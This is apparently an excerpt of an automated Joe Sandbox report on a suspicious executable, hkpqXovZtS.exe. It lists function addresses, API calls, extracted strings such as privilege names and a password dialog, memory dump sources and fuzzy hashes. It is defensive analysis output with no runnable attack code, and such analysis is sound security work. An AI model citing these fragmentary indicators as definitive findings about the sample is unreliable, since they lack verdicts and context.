                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: a61ceaefdea34b30c92998a8b411ce23b714a254bcfbfbd1191bec4e59c227ab
                                                                                                                • Instruction ID: d4659fa8b43980947e20d5bec7130a7ffc2e948ded38b433fa9f8f89d5dba95f
                                                                                                                • Opcode Fuzzy Hash: a61ceaefdea34b30c92998a8b411ce23b714a254bcfbfbd1191bec4e59c227ab
                                                                                                                • Instruction Fuzzy Hash: 1EF01833924601F78910FEFCF599C29B3EAAE84B157581C96F005DBD48C774F9904A98
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00415F1B
                                                                                                                  • Part of subcall function 00411CFE: _realloc.LIBCMT ref: 00411D56
                                                                                                                  • Part of subcall function 00419BE4: _malloc.LIBCMT ref: 00419BFE
                                                                                                                • _memset.LIBCMT ref: 0041616B
                                                                                                                • _memset.LIBCMT ref: 00416325
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog_malloc_realloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1826288403-3916222277
                                                                                                                • Opcode ID: b45412dfc1ea75b9c5487e1250868b71b65e2f846972b0943a4e5d2381a8cdf9
                                                                                                                • Instruction ID: 67b56e6fd5b49c4b91de99ed37ec21efa0c0af2c050572a8eecd629133f7ed59
                                                                                                                • Opcode Fuzzy Hash: b45412dfc1ea75b9c5487e1250868b71b65e2f846972b0943a4e5d2381a8cdf9
                                                                                                                • Instruction Fuzzy Hash: CCE1A071A00B45DFDB14EF64C890BEAB7B1FF48308F10482EE956A7281D778A991CB59
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy
                                                                                                                • String ID: T
                                                                                                                • API String ID: 3048848545-3187964512
                                                                                                                • Opcode ID: 2e5b9b3d5d71fa1e94147d15f4028b27beccdfefe5cdf68f9bf76e7ae5596274
                                                                                                                • Instruction ID: e309697e00dd7c7fc65afc2b2571d4ca809195f729a0fef38a9928ffc702c386
                                                                                                                • Opcode Fuzzy Hash: 2e5b9b3d5d71fa1e94147d15f4028b27beccdfefe5cdf68f9bf76e7ae5596274
                                                                                                                • Instruction Fuzzy Hash: 91812A71904708EFDB25DF64C884BEEB7E8AF05304F04416FE95997281DF786A84CB69
                                                                                                                APIs
                                                                                                                • __freea.LIBCMT ref: 022AF8EA
                                                                                                                  • Part of subcall function 022A798A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 022A79BC
                                                                                                                • __freea.LIBCMT ref: 022AF8F3
                                                                                                                • __freea.LIBCMT ref: 022AF916
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __freea$AllocateHeap
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 2243444508-2496334608
                                                                                                                • Opcode ID: 49ee4860c61bc9f464f2fd3324729da46c3e455319bce4b585c23a614e637658
                                                                                                                • Instruction ID: 464293032151da999f19bc54c2b13d30abaaf43223a69415b5320207754ef80f
                                                                                                                • Opcode Fuzzy Hash: 49ee4860c61bc9f464f2fd3324729da46c3e455319bce4b585c23a614e637658
                                                                                                                • Instruction Fuzzy Hash: C851C572520317AFDB215EE4CD60EAB36AAEF44754F65012AFC0497D48EB7ADC11CB90
                                                                                                                APIs
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 022A07AF
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 022A0863
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: csm$kL
                                                                                                                • API String ID: 3480331319-4174319936
                                                                                                                • Opcode ID: 28fb56188ec0dc00d3ca9edd4eaf348d988a6cc7f040d49a53cb7e0785acc7cc
                                                                                                                • Instruction ID: 32aa09d182fbfc09aa4e4e36306b952d378e257e07e0d74f8e92f65688d9c80d
                                                                                                                • Opcode Fuzzy Hash: 28fb56188ec0dc00d3ca9edd4eaf348d988a6cc7f040d49a53cb7e0785acc7cc
                                                                                                                • Instruction Fuzzy Hash: 0141B130E20309AFCF00DFA8C8A4BAEBBA5AF45318F448195E8189B759D7719B15CFD5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog_wcscpy
                                                                                                                • String ID: :$lB
                                                                                                                • API String ID: 2825759377-3626491908
                                                                                                                • Opcode ID: fff6dfd80e9f4094c82248fe7762a2aa2abcb5d553b30a5ca41e08294bf9f759
                                                                                                                • Instruction ID: 13b9769822bee8234e33102bf284fad2086586d4dca29c43877cd0c27cfb6428
                                                                                                                • Opcode Fuzzy Hash: fff6dfd80e9f4094c82248fe7762a2aa2abcb5d553b30a5ca41e08294bf9f759
                                                                                                                • Instruction Fuzzy Hash: F7418E71801518AADB21EB61DC51AEEB37CAF01348F0040AFF556731C5DB786F88CE69
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040D922
                                                                                                                  • Part of subcall function 0040CE40: SelectObject.GDI32(00000000,?), ref: 0040CEA6
                                                                                                                  • Part of subcall function 0040CE40: SelectObject.GDI32(?,?), ref: 0040CEB1
                                                                                                                  • Part of subcall function 0040CE40: SelectObject.GDI32(00000000,?), ref: 0040CED9
                                                                                                                  • Part of subcall function 0040CE40: SelectObject.GDI32(?,?), ref: 0040CEE1
                                                                                                                  • Part of subcall function 0040CE40: DeleteDC.GDI32(00000000), ref: 0040CEEA
                                                                                                                  • Part of subcall function 0040CE40: DeleteDC.GDI32(?), ref: 0040CEEF
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040D958
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040D963
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$Delete$MessageSend
                                                                                                                • String ID: STATIC
                                                                                                                • API String ID: 3221445509-1882779555
                                                                                                                • Opcode ID: 7ef77dc3baced7abcca8270526c810ef52559ad7408dd7420e3e787d639df2dc
                                                                                                                • Instruction ID: c9bad0333bcb60b9f0b690c7e64e6ed1e56a0dea592df98fcb5495743a4e6f69
                                                                                                                • Opcode Fuzzy Hash: 7ef77dc3baced7abcca8270526c810ef52559ad7408dd7420e3e787d639df2dc
                                                                                                                • Instruction Fuzzy Hash: EA21DA72541104BAEB21ABA5CC82FFF7369AF41B54F104136F900771C1DB7C99469ABD
                                                                                                                APIs
                                                                                                                • ___initmbctable.LIBCMT ref: 004220F8
                                                                                                                  • Part of subcall function 0042140C: __setmbcp.LIBCMT ref: 00421417
                                                                                                                • _parse_cmdline.LIBCMT ref: 0042213A
                                                                                                                • _parse_cmdline.LIBCMT ref: 0042217B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _parse_cmdline$___initmbctable__setmbcp
                                                                                                                • String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                                • API String ID: 1290970244-979263065
                                                                                                                • Opcode ID: 130a18c786c0c55605ed0c68f1cf483022f01e30eca0087883a58cb70d492ffd
                                                                                                                • Instruction ID: 2a6882aae0e60c19258fb6b8e9a46bb5ab1bc2fc0a32b81eb419a24eaa387be9
                                                                                                                • Opcode Fuzzy Hash: 130a18c786c0c55605ed0c68f1cf483022f01e30eca0087883a58cb70d492ffd
                                                                                                                • Instruction Fuzzy Hash: 81212771B001B8BBCB10DBA5BE80C9E7BB9FA42324760067BF610E3250D674AE55C75D
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$_swprintf
                                                                                                                • String ID: %.*ls(%u)%ls
                                                                                                                • API String ID: 120243331-2527286751
                                                                                                                • Opcode ID: 5aafee10f6c8830377de15d62b46ff065d13fc8eee9447b553876fc619cfb0d2
                                                                                                                • Instruction ID: dfd658a5abba8a3b166b0e543c1e19f029f64ed096bbde68f5115233caa860ba
                                                                                                                • Opcode Fuzzy Hash: 5aafee10f6c8830377de15d62b46ff065d13fc8eee9447b553876fc619cfb0d2
                                                                                                                • Instruction Fuzzy Hash: 2A11B772C00118BACF11AAA5CD409EFBB7CFF85705F1040BBF844B3151DB799A859B98
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004067FA
                                                                                                                  • Part of subcall function 00402BA4: __EH_prolog.LIBCMT ref: 00402BA9
                                                                                                                  • Part of subcall function 00406550: GetLastError.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000000,00000020,?), ref: 004065A5
                                                                                                                  • Part of subcall function 00406550: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00000020,?), ref: 004065B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$CloseErrorHandleLast
                                                                                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege$lB
                                                                                                                • API String ID: 2025198869-2145591228
                                                                                                                • Opcode ID: 6f7403409e7457e70ef40132f06063f7c188e8caac060c7ed8b7e470c00eaa4f
                                                                                                                • Instruction ID: caf21e769f74be6263a2fd3c3f4a3fe2d43f7bfc576c3d9522a3ce941ddb484d
                                                                                                                • Opcode Fuzzy Hash: 6f7403409e7457e70ef40132f06063f7c188e8caac060c7ed8b7e470c00eaa4f
                                                                                                                • Instruction Fuzzy Hash: 2D112472E00214EADF21BF96A8416EE7B65AF04308F50803FF415B72C2C7BD09508759
                                                                                                                APIs
                                                                                                                • DialogBoxParamW.USER32(GETPASSWORD1,?,0040D189,?,?), ref: 0040DF17
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DialogParam
                                                                                                                • String ID: 2C$2C$GETPASSWORD1
                                                                                                                • API String ID: 665744214-4112161682
                                                                                                                • Opcode ID: 317ad0b5af315d12eb810c31ae02d5b1f30821c7d872744a7df516915106c975
                                                                                                                • Instruction ID: 2a2c85addaa01aa2a96c8be4e68bf16374466eaab05288000d7c3937cded2372
                                                                                                                • Opcode Fuzzy Hash: 317ad0b5af315d12eb810c31ae02d5b1f30821c7d872744a7df516915106c975
                                                                                                                • Instruction Fuzzy Hash: B1113331A00245ABDB22DFA1EC81B9B3B54AB08754F19407BF9457B2C1C6B89C88CB6C
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c, xrefs: 022968C1, 022968D5, 022968F2
                                                                                                                • !(Operand->Length & 1), xrefs: 022968F3
                                                                                                                • X86Instruction->HasSrcAddressing, xrefs: 022968D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fprintf_l
                                                                                                                • String ID: !(Operand->Length & 1)$D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm_x86.c$X86Instruction->HasSrcAddressing
                                                                                                                • API String ID: 3906573944-1747295944
                                                                                                                • Opcode ID: 2316bee954fb8086a784b3f5459b5452e9fabfe29ea20cdc8d8f9314263f10d6
                                                                                                                • Instruction ID: 2e373037f1aad3b2397448098fb8a9d03c55be29adc1db2e8e58974b8a08aab5
                                                                                                                • Opcode Fuzzy Hash: 2316bee954fb8086a784b3f5459b5452e9fabfe29ea20cdc8d8f9314263f10d6
                                                                                                                • Instruction Fuzzy Hash: 31213571118B546BD3128BF9C800BE7FBDDAF55704F08845DF0EA42185D7B4A69487A1
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 022A7F3D
                                                                                                                • GetLastError.KERNEL32 ref: 022A7F47
                                                                                                                • __dosmaperr.LIBCMT ref: 022A7F4E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastModuleName__dosmaperr
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 4076908705-2496334608
                                                                                                                • Opcode ID: 6baf88851948b502d7dc262edad965363799b82d15d5263bc90baea72fc024d8
                                                                                                                • Instruction ID: 59e84c3ad420907985378fb63bea3f3d317dd375228016d591c1e6ab96fedda2
                                                                                                                • Opcode Fuzzy Hash: 6baf88851948b502d7dc262edad965363799b82d15d5263bc90baea72fc024d8
                                                                                                                • Instruction Fuzzy Hash: 57116971D5021CABCF20DFE8E89CBDEB7B9AF08300F1004D9E509E7240EA709A848F58
                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 0041D402
                                                                                                                  • Part of subcall function 0041D35D: ___BuildCatchObjectHelper.LIBCMT ref: 0041D393
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0041D419
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 0041D427
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2163707966-1018135373
                                                                                                                • Opcode ID: 16657854b3cd878b95a5f81d302afa970bf1bd0cd37b0f7a20a120cf7e0cd8b9
                                                                                                                • Instruction ID: 30bcff710ff7c0a1abe62c389d305dd4474dfea62ac20d76bdcd90a92c219a18
                                                                                                                • Opcode Fuzzy Hash: 16657854b3cd878b95a5f81d302afa970bf1bd0cd37b0f7a20a120cf7e0cd8b9
                                                                                                                • Instruction Fuzzy Hash: 3F01E871800109BBDF125F52CC46EEB7F6AEF09358F048016FD2815161D73AE9B2DBA9
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog
                                                                                                                • String ID: !o
                                                                                                                • API String ID: 3013590873-3047423414
                                                                                                                • Opcode ID: 862cd3bdf951ad10f594a7ed736a6a4be3b1d350dd8bceeba34624881d60138b
                                                                                                                • Instruction ID: 5d6935f0de0eb6cb04ea44958b23cfc4f4aed1d0a722a788545b222460988c70
                                                                                                                • Opcode Fuzzy Hash: 862cd3bdf951ad10f594a7ed736a6a4be3b1d350dd8bceeba34624881d60138b
                                                                                                                • Instruction Fuzzy Hash: 63F090B1690B90BAD315EB19DC56FEF76ACEF80B05F00412FF155A62C0DBF82641CA98
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,022A0E14,?,?,00000001,?,?,?,022A0F03,00000001,FlsFree,022B6CCC,FlsFree), ref: 022A0E70
                                                                                                                • GetLastError.KERNEL32(?,022A0E14,?,?,00000001,?,?,?,022A0F03,00000001,FlsFree,022B6CCC,FlsFree,?,?,022A0D1C), ref: 022A0E7A
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 022A0EA2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                • Opcode ID: 9507339be5bbe050d8be976b2e0acf7055293a8585202048754273c38dbd9709
                                                                                                                • Instruction ID: 0b3ced87e4ae9be720c2f9e9ffff11c2ac8ba13e8e47d161c15b3cfca2777590
                                                                                                                • Opcode Fuzzy Hash: 9507339be5bbe050d8be976b2e0acf7055293a8585202048754273c38dbd9709
                                                                                                                • Instruction Fuzzy Hash: 4BE04830AE4305FBEF115AE1ED09B593B59AF10B42F144860F94DE44D8D771D5209554
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,022A713D,022E4FE0,0000003F,00000000,022A15AA,?,022E4FE0,?,022A714A,00000000,00000000,00000000,00000000,00000000,022A8392), ref: 022A7150
                                                                                                                • GetCurrentProcess.KERNEL32(C0000417,0000003F,022E4FE0,00000218,00000000,?,00000000,?,0229187C,?,022E4FE0,00000000), ref: 022A7173
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0229187C,?,022E4FE0,00000000), ref: 022A717A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 124695548-2496334608
                                                                                                                • Opcode ID: a3e39537a99342f08708cc2a5cda5f12cd5ecd821e092286330637012e27f6b7
                                                                                                                • Instruction ID: e2545c07546dfb19782355f437e96783aa2e23753f4b7a9086beffce189addb6
                                                                                                                • Opcode Fuzzy Hash: a3e39537a99342f08708cc2a5cda5f12cd5ecd821e092286330637012e27f6b7
                                                                                                                • Instruction Fuzzy Hash: 09D05E72ED4220F7E5116AF13C0EBEB2A2CAF09725F0508A0F609991C6DB5598958AA5
                                                                                                                APIs
